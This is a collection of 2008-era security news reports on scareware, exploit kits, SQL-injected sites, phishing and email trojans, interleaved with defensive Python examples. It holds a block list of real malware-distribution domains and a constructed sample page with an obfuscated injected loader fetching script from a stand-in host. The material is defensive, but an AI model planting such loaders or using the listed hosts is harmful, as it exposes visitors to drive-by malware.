Washington state’s top law enforcement official has filed suit against a man accused of bombarding end users with misleading messages designed to trick them into buying software to fix PC problems that don’t exist.
The complaint, filed in Washington state court by Attorney General Rob McKenna’s office, names James Reed McCreary IV of The Woodlands, Texas, and two of his companies, Branch Software and Alpha Red. They stand accused of pushing a software package called Registry Cleaner XP by sending end users messages falsely claiming their PCs have corrupted or damaged registry settings that must be repaired immediately. The software sells for $40.
In many cases, the warnings are delivered using Windows Messenger Service, a network administration utility for delivering system-wide messages to end users. The popup windows claim to be generated by the “Local System” and warn of a “critical error” related to the end user’s registry. The messages were directed to a wide swath of internet protocol addresses, and in many cases were sent over and over, causing hundreds of windows to open that the user has to close individually.
The prevalence of so-called scareware has reached epidemic proportions. Programs frequently mimic real security features within the Windows operating system to fool people into believing their PC has been infected with malware. In many cases, it’s just about impossible to remove the software once it’s been installed.
“Through alarmist language seemingly delivered by a trusted source, defendants misrepresent the extent to which installing the software is necessary for repair of the computer for proper operation,” the complaint argues. The error messages, which appear on machines free of any problems, “induces the consumers to purchase defendants’ product, which must be used in order to ‘repair’ the ‘errors.’”
Microsoft referred the case to McKenna’s office and has been helpful in assisting the AG’s consumer protection high-tech unit to enforce laws against scareware mongers. Over the past three years, Microsoft has brought 17 lawsuits under Washington’s Computer Spyware Act and the state’s attorney general has filed seven.
A phone number listed as belonging to McCreary had been disconnected, and no one answered a number given in the WHOIS record for Branch Software.
Secure Computing’s anti-malware research labs have discovered a new exploit pack that exclusively targets PDF vulnerabilities, exposing Windows users to attack. The Portable Document Format (PDF) is one of the most widely used file formats today, since it is deployed across many operating systems. On the downside, the format has many known vulnerabilities that are exploited in the wild.
The toolkit targets only PDFs; no other exploits are used. Typical functions such as caching already-infected users are implemented on the server side: whenever a malicious PDF exploit is successfully delivered, the victim’s IP address is remembered for a certain period of time, and during that time the exploit is not delivered to that IP again, which is another burden for incident handling.
Other existing toolkits have also been enhanced with PDF exploits lately; the “El Fiesta” toolkit, for example, has added exploits for the Portable Document Format. End users are usually very slow to apply software patches, which gives the bad guys a huge opening for targeted, localized malware attacks.
Malware spreaders have had this kind of exploit in their arsenal for some time already. The “Tibs” group of malware, for example, is known for planting malicious IFRAMEs on infected legitimate websites and having them refer back to its exploit servers. Dissecting the shellcode shows that the payload of the exploits tries to load more malware, and the different number carried by each exploit appears to be a kind of affiliate ID used to keep statistics and track the different malware campaigns.
Users can use Secunia’s PSI (Personal Software Inspector) to find outdated software versions. The discovery of this toolkit is a very good reason to patch Adobe Reader.
Sunbelt, a developer of protection software known for its Kerio firewall, has been publishing a list of domains involved in spreading the Zlob trojan and the fake anti-virus known as Antivirus XP 2008 (and its clones). Domains on this list may infect visitors; they are considered malicious and should be added to filters as untrusted.
There is no foolproof method to identify every website as malicious or trusted, since trusted sites are often hacked or hijacked. The list from Sunbelt includes domains that were clearly registered for scams and malware distribution. It is comprehensive and updated on a regular basis.
The list contains many cloned rogue security products, scam sites and Zlob Trojan distributing sites.
Here is the list, last updated for September 20:
(Never visit those sites, they might infect your system)
Zlob Trojan Distributing site: 77.91.231.201 Movsdlls. com
77.91.231.183 Mediamswares. com
Scam Internet Security Page: 91.203.92.11 Asafetysite. com
404 Error page Scam: 91.203.92.12 Errordnsurl. com
Security Guide Scam Page: 91.203.92.11 Linksondesktop. com
Ad-Server-Gate Pages: 91.203.92.11 Gfbwd. com
91.203.92.11 Ogjtu. com
Security Center Scam Page: 91.203.92.12 Waysofsecurity. com
Scam Security Toolbar site: 91.203.92.12 Toolbarunit. com
IE AntiSpywareStore site: 92.62.101.83 Ieprogramming. com
Zlob Trojan Distributing site: 77.91.231.201 Movsdevices. com
77.91.231.183 Wmptools. com
Scam Internet Security Page: 91.203.92.12 Homesiteurls. com
404 Error page Scam: 91.203.92.11 Urlsofdnserrors. com
Security Guide Scam Page: 91.203.92.11 Fastshortcuts. com
Ad-Server-Gate Pages: 91.203.92.12 Xbstw. com
91.203.92.12 Eufnt. com
Security Center Scam Page: 91.203.92.11 Protectnotice. com
Scam Security Toolbar site: 91.203.92.11 Securealertbar. com
IE AntiSpywareStore site: 92.62.101.84 Ierenewals. com
Antivirus 2009 Fake/Scanner page: 84.16.252.138 Vassariumpromo. com
AntiVirus Lab 2009 Home page: 66.232.113.62 Viruslabs2009. com
Direct malware installation site: 91.203.93.37 Iwantfriday. com
77.91.231.183 Classicmediapl. com
Scam Internet Security Page: 91.203.92.11 Sweathomepage. com
404 Error page Scam: 91.203.92.12 Amistypedurl. com
Security Guide Scam Page: 91.203.92.12 Linkfordesktop. com
Ad-Server-Gate Pages: 91.203.92.11 Yuiqd. com
91.203.92.11 Hfnvp. com
Protection Center Scam Page: 91.203.92.12 Observesecure. com
Scam Security Toolbar site: 91.203.92.12 Aglobaltoolbar. com
IE AntiSpywareStore site: 216.255.179.244 Enhancedie. com
Antivirus 2009 Fake/Scanner page: 78.159.118.168 Prtectionactivescan. com
77.91.231.201 Immediallc. com
77.91.231.183 Softlayerdll. com
Scam Internet Security Page: 85.255.116.210 Dailyhomesite. com
404 Error page Scam: 85.255.116.214 Nowherepage. com
Security Guide Scam Page: 85.255.118.34 Firstaidclicks. com
Ad-Server-Gate Pages: 85.255.118.37 Oryfn. com
85.255.118.38 Eufks. com
Protection Center Scam Page: 85.255.118.34 Aprotectionhelp. com
Scam Security Toolbar site: 85.255.118.211 Safensecurebar. com
IE AntiSpywareStore site: 216.255.179.245 Ieextend. com
Windows Antivirus: 92.241.163.30 Windows-av. com
Micro Antivirus 2009: 91.208.0.223 Microantivirus2009. com
Antivirus Security: 78.159.114.116 Antivirussecurity-solution. com
77.91.231.201 Intervidd. com
77.91.231.183 Pwrware. com
MSX AV: 92.62.101.55 Ms-avc. com
Scam Internet Security Page: 85.255.116.212 Homepagetoday. com
404 Error page Scam: 85.255.118.243 Brokenurls. com
Security Guide Scam Page: 85.255.118.210 Desklinks. com
Ad-Server-Gate Pages: 85.255.118.212 Rycsp. com
85.255.118.213 Cusln. com
Scam Security Center site: 85.255.118.36 Pcsdefender. com
Scam Security Toolbar site: 85.255.118.35 Webprobar. com
IE toolbar redirect: 216.255.179.245 Ieextend. com
A clone of the Antispyware 2008 XP/WinSpywareProtect family:
85.255.119.14 scan.antispyware-free-scanner com
Not Active as-pro-xp-download com
78.157.142.79 files.as-pro-xp-download com
92.241.163.32 spypreventers com
77.244.220.134 online-security-systems com
77.244.220.134 xpprotector com
77.244.220.134 av-xp2008 net
New rogue clone of Antivirus XP 2008, XP Protector 2009 (Winifixer):
77.244.220.134 online-security-systems com
77.244.220.134 xpprotector com
77.244.220.134 av-xp2008 net
(Never visit those sites, they might infect your system)
We will update this list as it is updated on Sunbelt Blog.
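A filter import for lists in this shape, added here as an example and not code from Sunbelt or from this post. It parses the “Category: IP domain” lines (including the defanged “domain. com” form used above, continuation lines that inherit the previous category, heading lines that only name a family, and “Not Active” entries), re-fangs the names, and emits hosts-file sinkhole lines. The sample lines are constructed from entries above; the hosts-file output format is the example’s own choice.

```python
import re
from typing import List, NamedTuple, Optional

# Constructed sample lines in the shape of the Sunbelt-derived list above
# (domains deliberately defanged with a space before the TLD, as in the post).
SAMPLE_LIST = """\
Zlob Trojan Distributing site: 77.91.231.201 Movsdlls. com
77.91.231.183 Mediamswares. com
Scam Internet Security Page: 91.203.92.11 Asafetysite. com
Ad-Server-Gate Pages: 91.203.92.11 Ogjtu.com
A clone of the Antispyware 2008 XP/WinSpywareProtect family:
Not Active as-pro-xp-download com
85.255.119.14 scan.antispyware-free-scanner com
"""


class Entry(NamedTuple):
    category: str
    ip: Optional[str]  # None where the list says "Not Active"
    domain: str        # re-fanged, lower-cased


IP_RE = r"(?:\d{1,3}\.){3}\d{1,3}"
LINE_RE = re.compile(
    rf"^(?:(?P<category>[^:]+):\s*)?"                  # optional "Category:" prefix
    rf"(?:(?P<ip>{IP_RE})|Not Active)\s+"              # IP, or the list's inactive marker
    r"(?P<domain>[A-Za-z0-9.-]+?(?:\.\s?|\s)[A-Za-z]{2,})\s*$"
)


def refang(defanged: str) -> str:
    """'Movsdlls. com' / 'xpprotector com' -> 'movsdlls.com' / 'xpprotector.com'."""
    return ".".join(p for p in re.split(r"[.\s]+", defanged.strip()) if p).lower()


def valid_ipv4(ip: str) -> bool:
    return all(0 <= int(o) <= 255 for o in ip.split("."))


def parse_blocklist(text: str) -> List[Entry]:
    entries: List[Entry] = []
    category = "uncategorized"
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("("):      # blank lines and "(Never visit ...)" notes
            continue
        if line.endswith(":"):                    # heading line that only names a category
            category = line[:-1].strip()
            continue
        m = LINE_RE.match(line)
        if not m:
            continue                              # keep unparseable lines out of the filter
        if m.group("category"):
            category = m.group("category").strip()
        ip = m.group("ip")
        if ip is not None and not valid_ipv4(ip):
            continue
        entries.append(Entry(category, ip, refang(m.group("domain"))))
    return entries


def to_hosts_file(entries: List[Entry]) -> str:
    """Sinkhole lines for a hosts file, one per unique domain, category as a comment."""
    seen = set()
    lines = []
    for e in entries:
        if e.domain in seen:
            continue
        seen.add(e.domain)
        lines.append(f"0.0.0.0 {e.domain}  # {e.category}")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print(to_hosts_file(parse_blocklist(SAMPLE_LIST)), end="")
```

Entries the list marks “Not Active” are still emitted, since a domain that is parked today can be re-activated tomorrow; drop them in `to_hosts_file` if the filter should follow the list more literally.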
The website of the Texas National Guard remained unreachable on Friday, two days after security researchers said it had been hacked by miscreants who were using it to install malware on visitors’ PCs. Some pages on the site were probably compromised through SQL injection.
On Wednesday, Roger Thompson, chief research officer of anti-virus provider AVG, reported that selected pages on the site were attempting to install a rootkit on machines that were not fully patched. The ruse starts by silently redirecting visitors to a site called add-block-plus.net, which in turn bounces visitors to several other sites.
The attack comes as the Texas National Guard responds to Hurricane Ike, which earlier this week ravaged the gulf coast of Texas. Someone answering the guard’s public affairs line said the person responsible for the website was busy with relief efforts.
Not only has Texas been hammered by the hurricane; the people who are probably helping out the most have been hacked on top of it. The Texas National Guard now needs to find out how the bad guys got in and fix the flaw, which will most likely show up on other government-related websites as well. According to Sophos researchers, the Texas National Guard site is only one of many hit in this attack. The malware residing on the site is detected as Mal/ObfJS-A.
MessageLabs intercepted a targeted, email-borne malware attack on US schools and government organizations starting in early September. The majority of the targets are located in New Mexico, Virginia, Illinois and Hawaii. The attack comprised more than 1000 emails from only 15 source IP addresses, most of which were located in the former Soviet Union on consumer address ranges, signalling that the attacks came from a botnet that may be looking to expand.
Analysis reveals that distribution lasted almost two days and used social engineering to deliver the malware, Trojan-Spy.Win32.Zbot.ele, both as an executable email attachment and as a link within an email, disguised as a Microsoft Windows Update. There were three similar attacks targeting US schools, businesses and state governments. According to MessageLabs, these attacks may be deploying the Antivirus XP 2008 malware.
The attackers are taking advantage of hosts already infected with malware and using them as stepping stones for launching the attacks. Eventually, infected U.S.-based hosts are used to launch targeted attacks against U.S. schools and organizations.
Criminals are putting more effort into the quality assurance of their campaigns by localizing the spam message to the native language of the recipients, which they know from the segmented, sector-specific email database they have already purchased. In this particular targeted attack, however, they seem to have underestimated the personalization of the emails: despite the obvious segmentation of the potential victims, they relied on average social engineering tactics more suited to a large-scale malware campaign.
The victim count from these attacks is over 15,000 corporate users in 15 months. Victims include Fortune 500 companies, government agencies, financial institutions and legal firms. In these attacks, the goal is to gain access to corporate banking information, customer databases and other information to facilitate cyber crime. Two groups of attackers have carried out 95 percent of these attacks.
Spammers constantly use simple social engineering tactics that scare people into opening malicious files. This is definitely not the first time, and the method seems to be rather successful. TrendLabs reports a new form of spam email containing a malicious file attachment that has been spreading over the Internet. This time the subject is “Your internet access is going to get suspended”. The spam email claims to come from an “ICS Monitoring Team”, telling recipients that they have to stop illegally downloading copyrighted material or their Internet access will be suspended.
The spam email claims that a report of the recipient’s activities for the past six months is in the attached zipped file. Apparently, instead of the said report, the zipped file contains a malicious executable file named user-EA49943X-activities.exe.
The malicious file is currently detected as TROJ_MEREDROP.GJ by TrendLabs. It drops two files, both GOLDUN variants. These Trojans are known information stealers that monitor the Internet browsing activities of affected users. In this particular case the cyber-criminals intend to steal credentials for the online banking site www.e-gold.com.
This is not the first time malware authors have disguised themselves as the ‘Internet police’. Trend Micro researchers had already found spam that presented users with the same “ISP Consorcium” spiel used in this run.
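An attachment check of the kind a mail gateway would apply to a message like this, added here as an example and not TrendLabs’ code. It builds a constructed zip standing in for the attachment, with a harmless “MZ” stub under the reported file name, and flags members by executable extension and by PE header, so that an executable renamed to look like a report is still caught. Only the file name user-EA49943X-activities.exe comes from the report above; everything else is made up.

```python
import io
import os
import zipfile
from typing import List, Tuple

# Extensions Windows will run when double-clicked; the spam's attachment used ".exe".
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js", ".hta"}


def build_sample_zip() -> bytes:
    """Constructed stand-in for the attachment described above (not the real malware):
    a fake PE carrying the reported file name, a second one hiding behind a .pdf name,
    and a harmless text file. The fake PEs are just an 'MZ' header plus padding."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("user-EA49943X-activities.exe", b"MZ" + b"\0" * 62)
        z.writestr("activity_report.pdf", b"MZ" + b"\0" * 62)
        z.writestr("readme.txt", b"nothing to see here")
    return buf.getvalue()


def inspect_zip_attachment(data: bytes) -> List[Tuple[str, str]]:
    """Return (member name, reason) for every member that looks like a Windows executable.
    The check uses both the extension and the 'MZ' DOS header, so renaming the file does
    not hide it; encrypted members are reported because they cannot be inspected."""
    findings: List[Tuple[str, str]] = []
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [("<archive>", "corrupt or not a zip file")]
    with archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            ext = os.path.splitext(info.filename.lower())[1]
            if info.flag_bits & 0x1:            # general-purpose bit 0: member is encrypted
                findings.append((info.filename, "encrypted member, cannot inspect"))
                continue
            with archive.open(info) as member:
                head = member.read(2)           # only the header is needed, never the whole file
            is_exe_ext = ext in EXECUTABLE_EXTS
            is_pe = head == b"MZ"
            if is_exe_ext and is_pe:
                findings.append((info.filename, "executable extension and MZ header"))
            elif is_exe_ext:
                findings.append((info.filename, "executable extension"))
            elif is_pe:
                findings.append((info.filename, "MZ header under a non-executable name"))
    return findings


if __name__ == "__main__":
    for name, reason in inspect_zip_attachment(build_sample_zip()):
        print(f"{name}: {reason}")
```

Reading only the first two bytes of each member keeps the check cheap and avoids inflating a decompression bomb; a gateway would quarantine on any finding rather than try to judge which executable is “safe”.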
Facebook’s security team has introduced a new security warning feature that alerts users about potentially malicious third-party websites they are about to visit. Facebook is constantly under attack from phishers and malware authors who look for creative ways to exploit Facebook’s huge user base.
The new Facebook feature adds a warning message to links it suspects of being spam or phishing. The message states: “You are about to leave Facebook to visit this address. For the safety and privacy of your Facebook account, remember to never enter your password unless you’re on the real Facebook web site”.
The new feature should slow down ongoing malicious campaigns and make the user think twice before clicking further. Just last August, several worms used Facebook to propagate and infect users. This security improvement arrives just in time, since Trend Micro recently stumbled upon another Facebook phishing site, probably one of a few thousand. The page looks very similar to the actual Facebook login page and asks users to log into their accounts by entering their email addresses and passwords. After providing the required information, users are led to the legitimate Facebook site, tricking them into thinking that their account information is still safe from malicious users, when in fact it has already been stolen.
The theft happens when users enter their account credentials on the fake Facebook page. The details written on the fields are logged, and are in turn used by the people behind this operation for different purposes. Email accounts may be used in sending spam to one’s contacts, for example. Leading users to the actual Facebook page after they have entered their account information is a trick to prevent users from discovering the theft.
Facebook, along with many other popular social networking sites, is being targeted for fraud, in addition to various malware infection tactics. It would be even more secure if Facebook integrated freely available blacklists of malicious and phishing sites (such as Google’s Safe Browsing diagnostic, SiteAdvisor or PhishTank) and implemented some form of URL shortening that highlights the original domain, in order to expose phishing links.
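A server-side version of the leaving-the-site check and of the “highlight the original domain” idea, written as an added example and not Facebook’s implementation. It classifies a link as internal or external, brackets the registrable domain that actually decides where the browser goes, and appends the warning signs it notices (brand name inside a foreign host, user-info before “@”, bare IP literal). OWN_DOMAINS, BRAND_TOKENS and the sample URLs are assumptions; the two-label domain cut-off is a simplification of a Public Suffix List lookup, and the notice text is the one quoted above.

```python
import ipaddress
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Assumptions for this example: the site's own registrable domain(s) and the brand
# strings a lookalike host would reuse. Neither is taken from the post.
OWN_DOMAINS = {"facebook.com"}
BRAND_TOKENS = ("facebook",)

LEAVE_NOTICE = ("You are about to leave Facebook to visit this address. For the safety and "
                "privacy of your Facebook account, remember to never enter your password "
                "unless you're on the real Facebook web site.")


def registrable_domain(host: str) -> str:
    """Last two labels of the host. A real deployment would use the Public Suffix List
    (so that 'example.co.uk' is not cut to 'co.uk'); two labels suffice for these samples."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def classify_link(url: str) -> Dict[str, object]:
    """Decide whether a link leaves the site and what to show the user about it."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    userinfo = (parts.username or "").lower()
    reasons: List[str] = []

    if is_ip_literal(host):
        reg = host
        reasons.append("bare IP address instead of a hostname")
    else:
        reg = registrable_domain(host)
    external = reg not in OWN_DOMAINS

    if external:
        # A brand name inside a foreign host ('www.facebook.com.login-verify.example')
        # or in the user-info part ('facebook.com@...') is the classic lookalike trick.
        if any(tok in host or tok in userinfo for tok in BRAND_TOKENS):
            reasons.append("brand name used inside a foreign host or user-info part")
        if userinfo:
            reasons.append("text before '@' is user-info, not the host")

    # Bracket the part that actually decides where the request goes, so the
    # interstitial can highlight it: 'www.facebook.com.[login-verify.example]'.
    if external and not is_ip_literal(host):
        highlighted = host[: len(host) - len(reg)] + "[" + reg + "]"
    else:
        highlighted = host

    warning: Optional[str] = None
    if external:
        warning = LEAVE_NOTICE
        if reasons:
            warning += " Warning signs: " + "; ".join(reasons) + "."
    return {"host": host, "registrable": reg, "external": external,
            "highlighted": highlighted, "warning": warning}


if __name__ == "__main__":
    # Constructed sample links: one internal, one lookalike, one '@' trick, one plain external.
    for u in ("https://www.facebook.com/profile.php?id=1",
              "http://www.facebook.com.login-verify.example/index.php",
              "http://facebook.com@203.0.113.5/",
              "https://example.org/page"):
        print(u, "->", classify_link(u)["highlighted"], "|", classify_link(u)["warning"])
```

The decision is made on the parsed host, never on the link text, because the phishing pages described above rely on the visible text and the real destination being different things.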
Malicious hackers have broken into several sections of BusinessWeek.com, and as a result the content has been infected with Mal/Badsrc-C via SQL injection. The infected pages relate to jobs and recruitment.
Currently hundreds of pages on BusinessWeek.com are being rigged with malicious JavaScript pointing to third-party servers. Visitors to the site execute the script, which attempts to launch drive-by malware downloads. Some malicious pages are successfully bypassing Firefox 3 blacklist-based filter.
According to data from the Google Safe Browsing API, BusinessWeek.com has been flagged as malicious for a while:
Of the 2157 pages we tested on the site over the past 90 days, 214 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 09/15/2008, and the last time suspicious content was found on this site was on 09/11/2008.
Malicious software includes 721 scripting exploit(s), 4 trojan(s), 3 exploit(s). Successful infection resulted in an average of 2 new processes on the target machine.
Malicious software is hosted on 90 domain(s), including adbtch.com, advabnr.com, bnsdrv.com.
11 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including advabnr.com, bnsdrv.com, cv2e.ru.
BusinessWeek.com joins high-profile targets such as Bank of India, China.com, and USA Today which were recently hit by similar SQL injections. According to expert estimates, at least 70 percent of all Web-based malware is now being hosted on legitimate Web sites.
As usual, we advise users to use Firefox, and Firefox users to install the NoScript add-on, which protects against JavaScript injected into compromised websites (and against many other malicious elements).
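A scanner for pages injected in the way described here and in the Texas National Guard item above, added as an example and not AVG’s, Sophos’ or Google’s code. It walks the HTML and reports script and iframe sources on hosts outside an allow-list, zero-size or display:none frames, and inline scripts carrying document.write(unescape(...))-style obfuscation. The allow-list, the sample page and the bad-ads.example host are constructed; the real domains listed above are deliberately not used.

```python
import re
from html.parser import HTMLParser
from typing import List, Set, Tuple
from urllib.parse import urlsplit

# Assumption: the hosts this site legitimately loads scripts and frames from.
ALLOWED_HOSTS: Set[str] = {"www.businessweek.example", "static.businessweek.example"}

# Markers typical of injected, obfuscated loaders: document.write(unescape(...)),
# eval(unescape(...)) and long runs of %xx-encoded text.
OBFUSCATION_RE = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(|eval\s*\(\s*unescape\s*\(|(?:%[0-9A-Fa-f]{2}){8,}")

# Constructed page in the shape of a compromised jobs page; every host is invented.
SAMPLE_HTML = """<html><head>
<script src="https://static.businessweek.example/site.js"></script>
</head><body>
<h1>Jobs and recruitment</h1>
<script src="http://bad-ads.example/b.js"></script>
<iframe src="http://bad-ads.example/in.cgi?3" width="0" height="0"></iframe>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A%2F%2Fbad-ads.example%2Fx.js%22%3E%3C%2Fscript%3E'));</script>
</body></html>
"""


def _is_hidden(attrs: dict) -> bool:
    style = re.sub(r"\s+", "", attrs.get("style") or "").lower()
    return attrs.get("width") == "0" or attrs.get("height") == "0" or "display:none" in style


class InjectionScanner(HTMLParser):
    def __init__(self, allowed: Set[str]):
        super().__init__()
        self.allowed = allowed
        self.findings: List[Tuple[str, str]] = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("script", "iframe") and a.get("src"):
            host = (urlsplit(a["src"]).hostname or "").lower()
            if host and host not in self.allowed:
                self.findings.append((f"<{tag} src>", f"external host {host}"))
        if tag == "iframe" and _is_hidden(a):
            self.findings.append(("<iframe>", "hidden frame (zero size or display:none)"))
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands over <script> bodies verbatim, so inline loaders can be matched.
        if self._in_script and OBFUSCATION_RE.search(data):
            self.findings.append(("inline <script>", "obfuscation markers in inline script"))


def scan_html(html: str, allowed: Set[str] = ALLOWED_HOSTS) -> List[Tuple[str, str]]:
    """Return (where, reason) findings for one page; an empty list means nothing suspicious."""
    scanner = InjectionScanner(allowed)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for where, reason in scan_html(SAMPLE_HTML):
        print(f"{where}: {reason}")
```

Run over content pulled straight from the database (the rows that the SQL injection actually modified) rather than over rendered pages, the same scanner tells you which records were altered and need to be restored.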
SophosLabs has intercepted a widespread malicious spam campaign claiming that there was a powerful explosion at a nuclear power station outside London two days ago. According to the email, the government has stopped the media from reporting the incident and prevented anyone affected by it from contacting the outside world. The email attachment (called victims.zip) supposedly contains images of the devastation left by the explosion and pictures of victims’ bodies.
No such plant exists anywhere near London. The nearest is probably Dungeness B in south east Kent, some 77 miles (124km) by road from the capital. The attached zip file is contaminated with a Trojan horse, identified by net security firm Sophos as Troj/Agent-HQE. Once the malware is installed, hackers can use it to spy on the victim’s computer and steal information for financial gain.
The emails typically arrive with subject lines such as “Reply: A report on radiation contamination of Canada”, suggesting that a nuclear disaster has occurred and the UK and local authorities have succeeded in hushing it up.
“Rather than use a real life event, the hackers have turned to fictional explosions and conspiracy theories in the hope they will strike a nerve with potential victims who will then click on the attachment without a second thought,” commented Graham Cluley, senior technology consultant at Sophos.
All computer users need to show some common sense and delete these messages. Until everyone wakes up to these social engineering tactics, the cybercriminals will continue to use them. As always, it’s a good idea to ensure that your computer is defended with up-to-date anti-virus protection.
According to Chris Boyd, director of malware research at IM security firm Facetime, miscreants are using a fake Twitter profile in a bid to spread malware that harvests login credentials for Orkut. Updates to the fake Twitter profile are supposedly being followed by 17 punters, but they’re all fake.
The profile is designed to trick would-be marks into viewing a photo album on Orkut, which supposedly requires a Flash update to view. This bogus Flash update is contaminated by malware, specifically the OrkutTron Trojan.
OrkutTron performs a variety of malicious actions including an attempt to snaffle login credentials for Orkut, the Google-run social networking site that’s particularly big in Brazil. Fitting in with this theme, the fake Twitter profile is written in Portuguese.
Attacks targeting Orkut are relatively commonplace, but as Boyd notes, the use of Twitter represents an innovation in such hacking attacks.